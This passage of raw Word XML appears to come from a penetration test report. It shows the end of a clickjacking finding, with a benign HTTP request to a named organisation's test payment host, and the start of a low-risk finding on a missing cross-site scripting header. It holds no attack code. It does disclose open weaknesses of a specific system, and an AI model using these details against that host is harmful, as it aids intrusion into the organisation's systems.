                  <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>https://www.owasp.org/index.php/Clickjacking_Defense_Cheat_Sheet</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00AA4501">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="4E1360ED" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="31FEF483"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Retest Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="1CF715FE" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00F03F96" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="27459E3C" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9594" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="587A5204" w14:textId="77777777" w:rsidR="002E67F3" w:rsidRDefault="002E67F3" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">In the below example, the “register” page is framed exposing the vulnerability. This is demonstrated in the registration page, however the vulnerability exist throughout the application. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67A94F33" w14:textId="77777777" w:rsidR="002E67F3" w:rsidRPr="002E67F3" w:rsidRDefault="002E67F3" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002E67F3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Image Caption:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65503902" w14:textId="77777777" w:rsidR="002E67F3" w:rsidRDefault="002E67F3" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">The below image demonstrates the application being rendered within another webpage, allowing for clickjacking attacks. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51A7E7A1" w14:textId="77777777" w:rsidR="002E67F3" w:rsidRDefault="002E67F3" w:rsidP="00A82FF7">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="799E7BBF" wp14:editId="5A3AA0C5">
                  <wp:extent cx="4552950" cy="26670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801" t="13326" r="22629" b="16275"/>
                          <a:stretch/>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4552950" cy="2667000"/>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316DE687" w14:textId="77777777" w:rsidR="002E67F3" w:rsidRPr="002E67F3" w:rsidRDefault="002E67F3" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002E67F3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HTTP Request:</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="9354"/>
            </w:tblGrid>
            <w:tr w:rsidR="002E67F3" w:rsidRPr="002E67F3" w14:paraId="0DFF2247" w14:textId="77777777" w:rsidTr="002E67F3">
              <w:trPr>
                <w:trHeight w:val="846"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="9354" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
                </w:tcPr>
                <w:p w14:paraId="6031971E" w14:textId="77777777" w:rsidR="002E67F3" w:rsidRPr="002E67F3" w:rsidRDefault="002E67F3" w:rsidP="00AB52AF">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="002E67F3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">GET </w:t>
                  </w:r>
                  <w:r w:rsidRPr="002E67F3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="002E67F3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>gofundhip</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="002E67F3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>/register</w:t>
                  </w:r>
                  <w:r w:rsidRPr="002E67F3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> HTTP/1.1</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="697F3E13" w14:textId="77777777" w:rsidR="002E67F3" w:rsidRPr="002E67F3" w:rsidRDefault="002E67F3" w:rsidP="00AB52AF">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="002E67F3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Host: payment.sit2.va.anthem.com</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="517D597C" w14:textId="77777777" w:rsidR="002E67F3" w:rsidRPr="002E67F3" w:rsidRDefault="002E67F3" w:rsidP="00AB52AF">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="002E67F3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="50DECA2E" w14:textId="77777777" w:rsidR="002E67F3" w:rsidRPr="002E67F3" w:rsidRDefault="002E67F3" w:rsidP="00AB52AF">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="002E67F3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Connection: close</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="0FD2AFEC" w14:textId="77777777" w:rsidR="002E67F3" w:rsidRPr="002E67F3" w:rsidRDefault="002E67F3" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002E67F3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HTTP Response:</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="9354"/>
            </w:tblGrid>
            <w:tr w:rsidR="002E67F3" w:rsidRPr="002E67F3" w14:paraId="2AAE3D07" w14:textId="77777777" w:rsidTr="002E67F3">
              <w:trPr>
                <w:trHeight w:val="1701"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="9354" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
                </w:tcPr>
                <w:p w14:paraId="20B3B811" w14:textId="77777777" w:rsidR="002E67F3" w:rsidRPr="002E67F3" w:rsidRDefault="002E67F3" w:rsidP="00AB52AF">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="002E67F3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>HTTP/1.1 200 OK</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="29A93B05" w14:textId="77777777" w:rsidR="002E67F3" w:rsidRPr="002E67F3" w:rsidRDefault="002E67F3" w:rsidP="00AB52AF">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="002E67F3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Date: Mon, 20 May 2019 15:08:33 GMT</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="5C49F64C" w14:textId="77777777" w:rsidR="002E67F3" w:rsidRPr="002E67F3" w:rsidRDefault="002E67F3" w:rsidP="00AB52AF">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="002E67F3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Last-Modified: Wed, 13 Mar 2019 10:53:40 GMT</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="1C7AA664" w14:textId="77777777" w:rsidR="002E67F3" w:rsidRPr="002E67F3" w:rsidRDefault="002E67F3" w:rsidP="00AB52AF">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="002E67F3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>ETag</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="002E67F3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>: "143fd-58d-583f79e53b500"</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="284E0992" w14:textId="77777777" w:rsidR="002E67F3" w:rsidRPr="002E67F3" w:rsidRDefault="002E67F3" w:rsidP="00AB52AF">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="002E67F3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Accept-Ranges: bytes</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="54D1E534" w14:textId="77777777" w:rsidR="002E67F3" w:rsidRPr="002E67F3" w:rsidRDefault="002E67F3" w:rsidP="00AB52AF">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="002E67F3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Content-Length: 1421</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="1352DA74" w14:textId="77777777" w:rsidR="002E67F3" w:rsidRPr="002E67F3" w:rsidRDefault="002E67F3" w:rsidP="00AB52AF">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="002E67F3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Content-Type: text/html</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="6C935075" w14:textId="77777777" w:rsidR="002E67F3" w:rsidRDefault="002E67F3" w:rsidP="00AB52AF">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="002E67F3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Connection: close</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="6A827ACF" w14:textId="77777777" w:rsidR="002E67F3" w:rsidRPr="002E67F3" w:rsidRDefault="002E67F3" w:rsidP="00AB52AF">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="002E67F3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="7968099C" w14:textId="77777777" w:rsidR="002E67F3" w:rsidRPr="002E67F3" w:rsidRDefault="002E67F3" w:rsidP="002E67F3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="34D42150" w14:textId="77777777" w:rsidR="00304781" w:rsidRPr="00397EF0" w:rsidRDefault="00304781" w:rsidP="00D246C9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="490ED8C6" w14:textId="77777777" w:rsidR="00CF0DE5" w:rsidRPr="00397EF0" w:rsidRDefault="00CF0DE5" w:rsidP="00CF0DE5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="534A1657" w14:textId="77777777" w:rsidR="004B7AE8" w:rsidRPr="00397EF0" w:rsidRDefault="004B7AE8" w:rsidP="004B7AE8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc10703673"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidRPr="00397EF0">
        <w:rPr>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Low-Risk Findings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9594" w:type="dxa"/>
        <w:tblBorders>
          <w:insideH w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:left w:w="115" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2005"/>
        <w:gridCol w:w="7589"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="4FAE80E9" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:trPr>
          <w:trHeight w:val="432"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9594" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="228B22"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5C47F5D3" w14:textId="35BDB829" w:rsidR="004B7AE8" w:rsidRPr="00397EF0" w:rsidRDefault="00983E25" w:rsidP="00F03F96">
            <w:pPr>
              <w:pStyle w:val="Heading2"/>
            </w:pPr>
            <w:bookmarkStart w:id="13" w:name="LowFindings"/>
            <w:bookmarkStart w:id="14" w:name="_Toc10703674"/>
            <w:r>
              <w:t>L1</w:t>
            </w:r>
            <w:r w:rsidRPr="00397EF0">
              <w:t xml:space="preserve"> – </w:t>
            </w:r>
            <w:r>
              <w:t>Missing Safeguard: Cross</w:t>
            </w:r>
            <w:r w:rsidR="008B08E2">
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:t>Site Scripting Protection Header</w:t>
            </w:r>
            <w:r w:rsidRPr="00397EF0">
              <w:t xml:space="preserve"> – </w:t>
            </w:r>
            <w:r>
              <w:t>Open</w:t>
            </w:r>
            <w:bookmarkEnd w:id="14"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="04DD0F24" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74943BA4"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CVSS Score and Link</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75C0E9FA" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="0098400D" w:rsidP="00F03F96">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2258"/>
              </w:tabs>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId28" w:anchor="CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:N" w:history="1">
              <w:r w:rsidR="00983E25" w:rsidRPr="00FD79FD">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>3.7</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="4455FEBB" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="2F9A7A2C"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CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="544DB643" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00983E25" w:rsidP="00F03F96">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2258"/>
              </w:tabs>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-79: Improper Neutralization of Input During Web Page Generation</w:t>
            </w:r>
            <w:r w:rsidR="00FD79FD">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Cross-site Scripting</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="39C2CD2C" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="321A3655"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Affected Systems</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32A33206" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00FD79FD" w:rsidP="00F03F96">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2258"/>
              </w:tabs>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
